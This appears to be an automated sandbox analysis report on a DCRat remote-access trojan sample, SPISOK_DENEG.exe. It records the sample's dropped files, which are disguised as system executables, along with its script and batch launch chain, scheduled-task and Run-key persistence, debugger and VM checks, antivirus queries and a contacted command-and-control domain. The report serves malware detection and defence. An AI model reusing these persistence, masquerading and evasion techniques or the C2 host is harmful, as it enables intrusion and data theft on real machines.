                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File opened: C:\Users\user\AppData
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File opened: C:\Users\user\AppData\Local\Temp
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File opened: C:\Users\user\Desktop\desktop.ini
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File opened: C:\Users\user\AppData\Local
                                  Source: SPISOK_DENEG.exe, 00000000.00000003.1676418346.0000000002B48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: ChainPortsurrogate.exe, 00000004.00000002.1804763678.000000001B9AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                  Source: wscript.exe, 00000001.00000003.1738780933.0000000002E48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
                                  Source: wscript.exe, 00000001.00000003.1738780933.0000000002E48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: w32tm.exe, 00000027.00000002.1850782659.00000252AE8F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | API call chain: ExitProcess graph end node graph_0-23752
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000EF838
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000F7DEE mov eax, dword ptr fs:[00000030h] 0_2_000F7DEE
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000FC030 GetProcessHeap,0_2_000FC030
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process token adjusted: Debug
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Process token adjusted: Debug
                                  Source: C:\Users\Default\Documents\dllhost.exe | Process token adjusted: Debug
                                  Source: C:\Users\Default\Documents\dllhost.exe | Process token adjusted: Debug
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | Process token adjusted: Debug
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | Process token adjusted: Debug
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe | Process token adjusted: Debug
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe | Process token adjusted: Debug
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process token adjusted: Debug
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process token adjusted: Debug
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process token adjusted: Debug
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000EF838
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000EF9D5 SetUnhandledExceptionFilter,0_2_000EF9D5
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000EFBCA
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000F8EBD
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Memory allocated: page read and write | page guard
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000EF654 cpuid 0_2_000EF654
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_000EAF0F
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Queries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Queries volume information: C:\ProviderserverruntimeperfSvc\ctfmon.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Queries volume information: C:\ProviderserverruntimeperfSvc\ctfmon.exe VolumeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exe | Queries volume information: C:\Users\Default\Documents\dllhost.exe VolumeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exe | Queries volume information: C:\Users\Default\Documents\dllhost.exe VolumeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | Queries volume information: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe VolumeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | Queries volume information: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe VolumeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe | Queries volume information: C:\Program Files (x86)\jDownloader\config\explorer.exe VolumeInformation
                                  Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe | Queries volume information: C:\Program Files (x86)\jDownloader\config\explorer.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Queries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Queries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Queries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformation
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_000EDF1E
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000DB146 GetVersionExW,0_2_000DB146
                                  Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                  Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                  Stealing of Sensitive Information

                                  Source: Yara match | File source: SPISOK_DENEG.exe, type: SAMPLE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.679d6f4.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.70a16f4.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.679d6f4.0.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 4.0.ChainPortsurrogate.exe.ea0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.70a16f4.1.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match | File source: 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match | File source: 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match | File source: 00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara match | File source: Process Memory Space: SPISOK_DENEG.exe PID: 7576, type: MEMORYSTR
                                  Source: Yara match | File source: Process Memory Space: ChainPortsurrogate.exe PID: 7768, type: MEMORYSTR
                                  Source: Yara match | File source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Windows\debug\backgroundTaskHost.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, type: DROPPED
                                  Source: Yara match | File source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Users\Default\Documents\dllhost.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Program Files (x86)\jDownloader\config\explorer.exe, type: DROPPED

                                  Remote Access Functionality

                                  Source: Yara match | File source: SPISOK_DENEG.exe, type: SAMPLE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.679d6f4.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.70a16f4.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.679d6f4.0.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 4.0.ChainPortsurrogate.exe.ea0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 0.3.SPISOK_DENEG.exe.70a16f4.1.unpack, type: UNPACKEDPE
                                  Source: Yara match | File source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match | File source: 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match | File source: 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match | File source: 00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara match | File source: Process Memory Space: SPISOK_DENEG.exe PID: 7576, type: MEMORYSTR
                                  Source: Yara match | File source: Process Memory Space: ChainPortsurrogate.exe PID: 7768, type: MEMORYSTR
                                  Source: Yara match | File source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Windows\debug\backgroundTaskHost.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, type: DROPPED
                                  Source: Yara match | File source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Users\Default\Documents\dllhost.exe, type: DROPPED
                                  Source: Yara match | File source: C:\Program Files (x86)\jDownloader\config\explorer.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting
                                  Valid Accounts241
                                  Windows Management Instrumentation
                                  11
                                  Scripting
                                  1
                                  DLL Side-Loading
                                  1
                                  Disable or Modify Tools
                                  OS Credential Dumping1
                                  System Time Discovery
                                  1
                                  Taint Shared Content
                                  1
                                  Archive Collected Data
                                  1
                                  Encrypted Channel
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API
                                  1
                                  DLL Side-Loading
                                  11
                                  Process Injection
                                  1
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory3
                                  File and Directory Discovery
                                  Remote Desktop ProtocolData from Removable Media1
                                  Non-Application Layer Protocol
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter
                                  1
                                  Scheduled Task/Job
                                  1
                                  Scheduled Task/Job
                                  2
                                  Obfuscated Files or Information
                                  Security Account Manager57
                                  System Information Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive1
                                  Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Scheduled Task/Job
                                  31
                                  Registry Run Keys / Startup Folder
                                  31
                                  Registry Run Keys / Startup Folder
                                  1
                                  Software Packing
                                  NTDS251
                                  Security Software Discovery
                                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  DLL Side-Loading
                                  LSA Secrets1
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                  File Deletion
                                  Cached Domain Credentials151
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                  Masquerading
                                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                                  Virtualization/Sandbox Evasion
                                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                  Process Injection
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  Behavior Graph (rendered graph omitted): ID 1590008, Sample: SPISOK_DENEG.exe, Start date: 13/01/2025, Architecture: WINDOWS, Score: 100. Contacted domain: 77777cm.nyashtyan.in. Signatures at the top level: Suricata IDS alerts for network traffic, Found malware configuration, Antivirus detection for dropped file, plus 13 other signatures.
                                  Process chain shown in the graph: SPISOK_DENEG.exe (drops C:\...\ChainPortsurrogate.exe (PE32) and C:\...\4oe8qKx4BC4jNir9oLrOplwqP.vbe) -> wscript.exe (Windows Scripting host queries suspicious COM object, likely to drop second stage) -> cmd.exe -> ChainPortsurrogate.exe (drops C:\Windows\debug\backgroundTaskHost.exe, C:\Users\user\Desktop\tHgRxHTS.log, C:\Users\user\Desktop\jYNBNfNl.log, all PE32, and 9 other malicious files) -> csc.exe (drops C:\Windows\...\SecurityHealthSystray.exe, PE32; starts conhost.exe and cvtres.exe), schtasks.exe (queries sensitive video device information via WMI, Win32_VideoController), cmd.exe (starts conhost.exe, chcp.com, w32tm.exe and ChainPortsurrogate.exe) and 17 other processes. Also started at the top level: ctfmon.exe, dllhost.exe and 8 other processes, each flagged by antivirus, multi AV scanner and machine learning detection for dropped file.

                                  Source | Detection | Scanner | Label
                                  SPISOK_DENEG.exe | 58% | Virustotal |
                                  SPISOK_DENEG.exe | 74% | ReversingLabs | Win32.Trojan.Uztuby
                                  SPISOK_DENEG.exe | 100% | Avira | VBS/Runner.VPG
                                  SPISOK_DENEG.exe | 100% | Joe Sandbox ML |
                                  Source | Detection | Scanner | Label
                                  C:\ProviderserverruntimeperfSvc\ctfmon.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe | 100% | Avira | VBS/Runner.VPG
                                  C:\Windows\debug\backgroundTaskHost.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Program Files (x86)\jDownloader\config\explorer.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat | 100% | Avira | BAT/Delbat.C
                                  C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\Default\Documents\dllhost.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\Desktop\UxRLAXDP.log | 100% | Avira | TR/PSW.Agent.qngqt
                                  C:\Users\user\Desktop\CqAggkYA.log | 100% | Avira | TR/AVI.Agent.updqb
                                  C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\ProviderserverruntimeperfSvc\ctfmon.exe | 100% | Joe Sandbox ML |
                                  C:\Windows\debug\backgroundTaskHost.exe | 100% | Joe Sandbox ML |
                                  C:\Program Files (x86)\jDownloader\config\explorer.exe | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\tHgRxHTS.log | 100% | Joe Sandbox ML |
                                  C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | 100% | Joe Sandbox ML |
                                  C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML |
                                  C:\Users\Default\Documents\dllhost.exe | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\UxRLAXDP.log | 100% | Joe Sandbox ML |
                                  C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | 100% | Joe Sandbox ML |
                                  C:\Program Files (x86)\jDownloader\config\explorer.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\ProviderserverruntimeperfSvc\ctfmon.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\Default\Documents\dllhost.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\CqAggkYA.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\UxRLAXDP.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\YsSdHCtI.log | 25% | ReversingLabs |
                                  C:\Users\user\Desktop\jYNBNfNl.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\tHgRxHTS.log | 29% | ReversingLabs | Win32.Trojan.Generic
                                  C:\Windows\debug\backgroundTaskHost.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  No Antivirus matches
                                  No Antivirus matches
                                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
77777cm.nyashtyan.in | 104.21.16.1 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                      No contacted IP infos
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1590008
                                      Start date and time:2025-01-13 13:25:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 46s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:60
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:SPISOK_DENEG.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.expl.evad.winEXE@56/33@1/0
                                      EGA Information:
                                      • Successful, ratio: 15.4%
                                      HCA Information:
                                      • Successful, ratio: 93%
                                      • Number of executed functions: 310
                                      • Number of non-executed functions: 92
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, backgroundTaskHost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target ChainPortsurrogate.exe, PID 2596 because it is empty
                                      • Execution Graph export aborted for target ChainPortsurrogate.exe, PID 7644 because it is empty
                                      • Execution Graph export aborted for target ChainPortsurrogate.exe, PID 7736 because it is empty
                                      • Execution Graph export aborted for target EbnrVuXczrPqjyiJGoZ.exe, PID 4180 because it is empty
                                      • Execution Graph export aborted for target EbnrVuXczrPqjyiJGoZ.exe, PID 4504 because it is empty
                                      • Execution Graph export aborted for target ctfmon.exe, PID 2196 because it is empty
                                      • Execution Graph export aborted for target ctfmon.exe, PID 7884 because it is empty
                                      • Execution Graph export aborted for target dllhost.exe, PID 1804 because it is empty
                                      • Execution Graph export aborted for target dllhost.exe, PID 5496 because it is empty
                                      • Execution Graph export aborted for target explorer.exe, PID 1740 because it is empty
                                      • Execution Graph export aborted for target explorer.exe, PID 5568 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
12:26:08 | Task Scheduler | Run new task: ctfmonc path: "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
12:26:11 | Task Scheduler | Run new task: backgroundTaskHost path: "C:\Windows\debug\backgroundTaskHost.exe"
12:26:11 | Task Scheduler | Run new task: backgroundTaskHostb path: "C:\Windows\debug\backgroundTaskHost.exe"
12:26:11 | Task Scheduler | Run new task: ctfmon path: "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
12:26:11 | Task Scheduler | Run new task: dllhost path: "C:\Users\Default User\Documents\dllhost.exe"
12:26:11 | Task Scheduler | Run new task: dllhostd path: "C:\Users\Default User\Documents\dllhost.exe"
12:26:11 | Task Scheduler | Run new task: EbnrVuXczrPqjyiJGoZ path: "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
12:26:11 | Task Scheduler | Run new task: EbnrVuXczrPqjyiJGoZE path: "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
12:26:11 | Task Scheduler | Run new task: explorer path: "C:\Program Files (x86)\jdownloader\config\explorer.exe"
12:26:11 | Task Scheduler | Run new task: explorere path: "C:\Program Files (x86)\jdownloader\config\explorer.exe"
12:26:13 | Task Scheduler | Run new task: ChainPortsurrogate path: "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
12:26:14 | Task Scheduler | Run new task: ChainPortsurrogateC path: "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
12:26:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
12:26:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Program Files (x86)\jdownloader\config\explorer.exe"
12:26:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\Default User\Documents\dllhost.exe"
12:26:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\debug\backgroundTaskHost.exe"
12:26:47 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZ "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
12:26:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogate "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
12:27:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
12:27:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Program Files (x86)\jdownloader\config\explorer.exe"
12:27:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\Default User\Documents\dllhost.exe"
12:27:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\debug\backgroundTaskHost.exe"
12:27:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZ "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
12:27:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogate "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
12:27:52 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
12:28:00 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Program Files (x86)\jdownloader\config\explorer.exe"
12:28:08 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\Default User\Documents\dllhost.exe"
                                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
77777cm.nyashtyan.in | 01YP9Lwum8.exe | Get hash | malicious | DCRat | Browse | • 188.114.97.3
                                      No context
                                      No context
